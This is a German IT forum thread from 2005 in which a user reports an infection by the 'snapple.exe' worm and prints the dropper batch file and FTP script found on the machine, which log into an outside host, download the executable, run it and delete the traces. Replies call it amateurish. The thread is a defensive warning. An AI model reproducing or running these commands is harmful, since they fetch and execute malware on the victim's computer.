Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Trojaner "snapple.exe"

Frage Microsoft

Mitglied: Haggi

Haggi (Level 1) - Jetzt verbinden

10.05.2005, aktualisiert 11.05.2005, 6208 Aufrufe, 2 Kommentare

Hi, alle Viren-Wurm- und Troj.- Geplagten,

habe mir vor ein paar Tagen wegen einer kurzzeitig ausgeschalteten Firewall den "snapple.exe alias syshost.exe"-Wurm eingefangen. Zum Glück hat mein Virenscanner eine Verbreitung auf dem Rechner verhindern können. ABER interessant ist eine batch-Datei im Windows-Ordner, mit der dieses Teil immer wieder geladen werden könnte. Ich gebe sie hier mit der Kommandoerweiterung wieder:

1.bat

@echo off
ftp -n -v -s:.a
snapple.exe
del .a
del /F 1.bat
exit /y

.a

open wowvill.easydns.us 5192
user tr lo.max
binary
GET snapple.exe
bye

Damit wird snapple eingeschleust und gestartet. Da mein Virenscanner den Aufruf snapple.exe gestoppt hatte, haben die Löschbefehle nicht mehr gewirkt.

Also evtl. auch ähnliche Dateien suchen, wenn ein Schädling immer wieder kommt.
Ich habe meine Firewall jedenfalls für den o.g. Server (wowvill....) dicht gemacht.

Gute PC-Gesundheit.

Haggi
Mitglied: fritzo
10.05.2005 um 23:10 Uhr
scheint wohl von Anfängern geschrieben worden zu sein, das Teil. Ein Batchfile als Trigger und Vermehrungsroutine, interessant *grins*
Bitte warten ..
Mitglied: meto
11.05.2005 um 07:13 Uhr
Das sehe ich ähnlich. Wenn es einem so leicht gemacht wird, ist man als Admin immer sehr dankbar.
Bitte warten ..
Ähnliche Inhalte
Windows Server
Windows Server 2012 R2 - SETUPSQMT.EXE (1)

Frage von Sunny89 zum Thema Windows Server ...

Windows Server
gelöst exe aus Netzwerk über Client ausführen (Windows Server 2012 R2) (6)

Frage von peterpa zum Thema Windows Server ...

Neue Wissensbeiträge
Drucker und Scanner

Samsung SL-M4025ND, firmware update und (kompatible) Tonerkassetten

(1)

Erfahrungsbericht von markus-1969 zum Thema Drucker und Scanner ...

Router & Routing

PfSense auf Supermicro Intel Xeon D-15x8 SoC Bare Bone

Tipp von Dobby zum Thema Router & Routing ...

Windows Server

Exchange 2010 auf Windows Server 2016 und AD

(2)

Tipp von Herbrich19 zum Thema Windows Server ...

KVM

How to: Libvirt Port forwarding

(2)

Anleitung von fundave3 zum Thema KVM ...

Heiß diskutierte Inhalte
Netzwerkprotokolle
PC erhalten nicht immer eine gültige IP (29)

Frage von Lieberwolf zum Thema Netzwerkprotokolle ...

Windows Systemdateien
Windows 7 und 10 herunterfahren Knopf mit Script belegen (21)

Frage von c-o-o-p-e-r92 zum Thema Windows Systemdateien ...

Router & Routing
über Vmware auf eine FritzBox mit IPv6 per VPN (16)

Frage von Zockervogel zum Thema Router & Routing ...